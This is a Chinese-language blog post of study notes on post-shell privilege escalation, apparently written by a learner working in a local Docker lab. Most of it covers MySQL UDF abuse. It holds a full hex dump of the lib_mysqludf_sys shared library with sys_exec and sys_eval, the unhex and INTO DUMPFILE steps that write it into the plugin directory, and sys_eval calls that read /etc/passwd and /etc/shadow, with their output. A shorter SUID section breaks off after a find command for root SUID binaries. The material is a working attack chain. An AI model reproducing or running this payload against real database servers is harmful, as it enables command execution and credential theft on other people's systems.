QST2's BLOG

Version: WwJ

0%

提权学习之壹

Posted on Edited on In

提权学习之壹

After getting shell;

Mysql UDF

环境准备

docker

1
2
3
4
5
# Notice the order of args
docker run --name udf-test-mysql -p 33333:3306 `
-v "D:\works\Privilege Escalation\Mysql UDF\Docker Environment\mysql\log:/var/log/mysql" `
-v "D:\works\Privilege Escalation\Mysql UDF\Docker Environment\mysql\data:/var/lib/mysql" `
-e MYSQL_ALLOW_EMPTY_PASSWORD=yes -d mysql:9.0.1

连接

1
mysql -hlocalhost -P33333 -uroot

RCE 操作

检查 UDF 相关变量:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
SHOW VARIABLES LIKE "%plugin%";
/*
+-----------------------------------------------+--------------------------+
| Variable_name                                 | Value                    |
+-----------------------------------------------+--------------------------+
| plugin_dir                                    | /usr/lib64/mysql/plugin/ |
| replication_optimize_for_static_plugin_config | OFF                      |
+-----------------------------------------------+--------------------------+
*/

SHOW VARIABLES LIKE "%secure_file%";
/*
+------------------+-----------------------+
| Variable_name    | Value                 |
+------------------+-----------------------+
| secure_file_priv | /var/lib/mysql-files/ |
+------------------+-----------------------+
*/

这里发现 secure_file_priv 不为空,不符合 UDF 提权条件,手动改一下 /etc/my.cnf

1
2
# secure-file-priv=xxx
secure-file-priv=

还要修改 /usr/lib64/mysql/plugin/ 的写权限;

尝试写文件:

1
2
select '1111' into dumpfile '/usr/lib64/mysql/plugin/';
# Query OK, 1 row affected (0.001 sec)

可以开始操作了,随便找个 payload 试试水:

1
2
od /usr/share/sqlmap/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ -An -t x | tr -d ' '|tr -d '\n'
# 0b9aaa3d933b3a1976f47629a935024b42843605c8d2427a7b5e107ea7cd6c4ed771d77d05645c9089338cf377ceaa870865b0be15cefef76995cb5ed032e52af3fb6393961c1328b117531a102779627bf986f2fee81feee42a22a60dd36202a54cd9f982f4243e98f3b54b6d038c729c8acb9a7f8f2815d8ac32bfe18dd2845171ba6f78e1c5b3d687597b156005761825400ab003e6a4228355fde3beac0cb19c26d3da09fe187ca4f8917d5c7d95311eca2fef4b6b08c9b72c573bf0368f34aa239368718cd3ca0bf2cff35493f49b6add4b6f18a6b1d2e91da3a3ad6ff2e6e8c2266226899553ca1af8a5660acd9ec5adf39e27a028d1ae008308f4420836ce35db07e4a3295e848e3d1c3aa688b14a6911bcb0bf4fdbb5c6de32bbc46735c0bc93538cfa9d9d5c256f0daeafbdb4604926ad431a56c2ba70fb5a9a76e8a608793949d5ea9beb6eb6b375592b9c4812c94713b96c1c50e8237073f885cfd4e7e9483b65641dea7e040c98109991baa4ddb5cadd6481bc41f6f071f86b7f66ddc8c8b5cfc9989acf634fdfb95da6f610ca2c8ca11d831c4913cd53bb61b5f5084477479787c64dd97abdb1b2efc1cd9426a28242aa035aea4477191c9dcaa14ecce677ce4f4d575db1f0a5812abd9be40ce661f566a22bbd8436f970efeda3f411b8b13b2439a8bd05b32988645f4da43139bef1f17c2ac76abf4404e7e7af46c196ddd39014cc7ba2ce36e527ae19b99f4b30afcfb7d6c9469e29db80d0570d037f4807fc2bbc530006c362ff5eed51c80d5c77722eca141c122bfb83d770488b2a6fbd951943834bfb7cfcdc2c14bde3a57f54c74c6ba261ec833d1ebb83de4caf0c9fb93f6a64af8e2e7cd4d277f0126c5e117e5b43fe28ec6a0787ced4e917adffcc08d24f7f19a1ee15ebba250e146090a06b1a5ee2ac492432226112e68ffc6005baeb8e9a161197f88f5e32d61658382c8daa277b17c5efea3781a0192acd8c200ce6e30441237db2c31632c94c943f024d1ab77c04b2db49819b6b09ea523123f9865541b0c7ba7d8703ee33dbe263ac3bbcc5e24a4bfb2f92ea8b9b15c162b6cb6465bc95c9772c914a8317a700e5117420cdb2271333f32dcedcde9c4530c2f94e206700a6df1876b07bb71b515b3584511aaad2cfcd4f0a60d4bb29318defa71de36f3730957012e2f5b6f9aa937119ae6b7d9c0ca48e17f6fc8ecb42f246f9cd9d81659e2778e5962e02d308b50ef00bb3a0222993b6a3f2b1e44959799424459486d6be1289bf55b1f6be07a0074acf82cc0bc873cd5a9c783849db79962e8706b387f132a3377a67166bbbbc8bd9a568bd55bdbb8db6cdd3c90ef66245af81797bb8f44fa4eafcaa9259cba307d83e8add3748013911a1ae86f99f836ea99c26baa97fbb88f65f60090e023c8d49a55c858e3b8fa4f9fd302e51adb607b005503e0d9db7d4726d0433c2277c461f4dab301d3e71d8914ada203896a622e679f9905b62ceffad2dad63cb57d9466778d2a0d57404558a531f8f975956eceea65fbe195fc37d35217080bc6b2cfb73a45441f1951b4ff2c50e153cb950c5df402ece0ddfa8ddd860402b54759bad6d6bfb11c5735cffcf6b5b4de87454f39349a9659dd3c602c6574657a81617e416cded7bf1ad069fe09b618679bebb00a5ea59036719a8d89fdd8250befc5f54059c5aaf774105563a86a6a0cbe1ebe10e45a1feb8dbcd44e7d5815b54b0acdb25e2473ee1ae78eee80c78d1e60b8d1170c51679dd67a3e89c74906d6f807e64a932fa5e5ff650985bc39d15ccc12a3c1fc257a874bad460b992725aa258573665ba11830ffc110cc4392d43b105b946da252c421d01a61c4ecb2a7e8c19049c7f173a1da8254c8773a5a7fde8e9e0eaa10c2ced3a7b3044a9bb17e12731e61dac8d3ad541c2e1d98da4d5d1ee83e66541d32caacbd79b41c2e906340fe8eda2ddac57b84eebac940d6f273068df8d1fa207722ea2c5a78cfde9848866461d86a70337209f01af5a08e4356b9ec348c98107d4f194c0710971cf2fc6bc9577f08e62a668a133df5079266470edbbabf66eb55588f1b5223dae6db37f4f03d30b0db36db07465eeb2a8e6042b1cbfed6971482ff0a91be0b3c8faeb7528d2d108065ab007e983182bf84303a3664355c2e4e1bda9f655a4dbbbc37f207b03aa69ad64c8ca6b9e5ff0e900f22195712fa93a25bdf96576914e8dc4f13f03402a3afd8a58e0822d5fb9c8f80e3ef627506bdd08d2d02e931d6e3e4d2ac3d30171e409d540f31414a43d3c0c802725efd89c1691eeec1b9b12e73ac52cdf8facc737bc7932973e2af096a3a331bfb6e1adc62b7e1153fb79fc7fa7f7c1f3927d2ff1c2a48a12afe4ea414e0ffac3dad92e98b61b34ae2c8ce7f2acaf0e82f988dbe828517c29988513ada873c4bebab1e41f2ec6b9e43fec9562de55ce2c0b8673e581b764b3338c6fa82d3b07c2c1a0e174419298d1693ede29ed943476ebf0a6b15e41fb627988da2b6454b193a36e94ad7813e98c8ddac3a0d17a82d79dcfc547017443232762f206b77d1f87638a6e8fcdf08fbce5a893a97442defb371fef65c758f641f25860e30490ba14e2e29f3c0aca0dbc93f04bd46af824443795a82f4e62866c4a5578f36eb56c047cc9e59ffd1811bb269c1ad944c0880ee4ed59a71cfbdbad3424fc44b36510a5c06969cab7c820cc927091d937a4246603140839ee8e9af5fe2e9d7e137d83e9895b7d55c333d8ec20caf378f70089ad7a188abfd5219807825abc6f7fd2f75a7d79cf388a6fd888aadfa4657fe1e1c624c10ad8f6d8e20ddeacd513a70adb9fa486ab01f7b09157d6e5d20f29aa95ce5dc1a4ff2b6a139537030d1384836952d9f19cc1d0359b2d7b66dd08ecc1994f446bc27db33e1d87ef59385ce99576be6192bc495ebfe7ec2993413c6eae9cb7e9a942a11fe3c0eb15111c87522324780bc424a38e55697fcac7925598485309f73275d00f9433568a97652144c38744cc7c754525d2c35979dca08ae6268475e947d69f2de5484459f9814342db0c50eacf8f4d3caa5edc679614f109ecd18ab39a1bb7b57359b308c0cc4898a7137be23db974557c834a3b1efa04ca7557bc7b014508eb098df059dcae7810b08dd4c679f8a918473d6c11f78b492599fc47fb5f3426f8c325dea495b3dac75409b9cd0112428a6a6f362f0fdd6154d522bc5b2508b9d36a479e19a71c4eff57dbdee92dbe71c0c3a791db8aad477cfdf434d845b9024c97c956adf01ae065f273a411fd35e5e176d493ec383629a86d23721e1ed874520a6228718a9228ce038575823dae130a6fa3de09482ac7931e659775981938b797a5b9bb212596a94a98cf97972043da252f522f6ac64c365e66a690c92cbb10f80ce1042ab5e1e47795e89282bec7b188de490147bf13a6936183179ac09fab2382a945199c5fbaff60d0299a0a9fc9c980bc1f2f50387b23292e01646d01cf98aa976d0ba5f5de09a11bcb57dbc7b07f1f25a36d93c1a6cc3409a8fc199e48098ff7d6933bd1ed24795f4aec882b98571fec2eda0e8e9938954481a67c9295464fba2dee2bcd97502d8c3abb89b7a2fb094feeb7248b14638bfa802220769a1f9e2414c6f97494dbd50c04da450467bb2cb42b7d11757e253471da8423069a1f189bc4861c23778f4d976bbac4c15a57

写入 .so 文件(不是同一个):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# 7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400

set @a=unhex('7F454C46020101000000000...');
# Query OK, 0 row affected (0.001 sec)

select @a into dumpfile '/usr/lib64/mysql/plugin/mysql-udf.so';
# Query OK, 1 row affected (0.001 sec)

select * from mysql.func;
/*
+----------+-----+--------------+----------+
| name     | ret | dl           | type     |
+----------+-----+--------------+----------+
| sys_eval |   0 | mysql-udf.so | function |
+----------+-----+--------------+----------+
*/

select sys_eval('cat /etc/passwd');
/*
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
mysql:x:999:999::/var/lib/mysql:/bin/bash
*/

问题

似乎没有提权?

1
2
3
4
select sys_eval('cat /etc/shadow');
/*

*/

这里环境选取的是 docker-mysql 一个镜像,默认数据库的用户是 mysql 没有完全的 root 权限,故而没有达到提权的作用;

不过结合 SSRF 可以 RCE,具体还是看 whoami 的结果;

Linux suid

执行 ls -l 命令时,会有一个 10 位数的形如:

-rwsrwsrwx

的字符串,从第二位开始,每 3 位分别代表文件所有者、组用户、其他用户对于该文件的读、写、执行权限;

s 意为 suid,如所有者 / 所属组执行权限为 x 即代表此文件在执行时其进程会以文件所有者 / 所属组的身份运行;

Set owner User ID up on execution

顾名思义,程序运行时使用所属者的权限;

例如 passwd 命令,用于修改用户密码,此时修改 /etc/passwd & /etc/shadow,需要 root 权限,这里就要用 suid 机制进行授权;

提权步骤

查找 SUID 文件

使用以下命令:

1
2
3
4
5
6
# 查找 root suid
find / -user root -perm -4000 -print 2>/dev/null
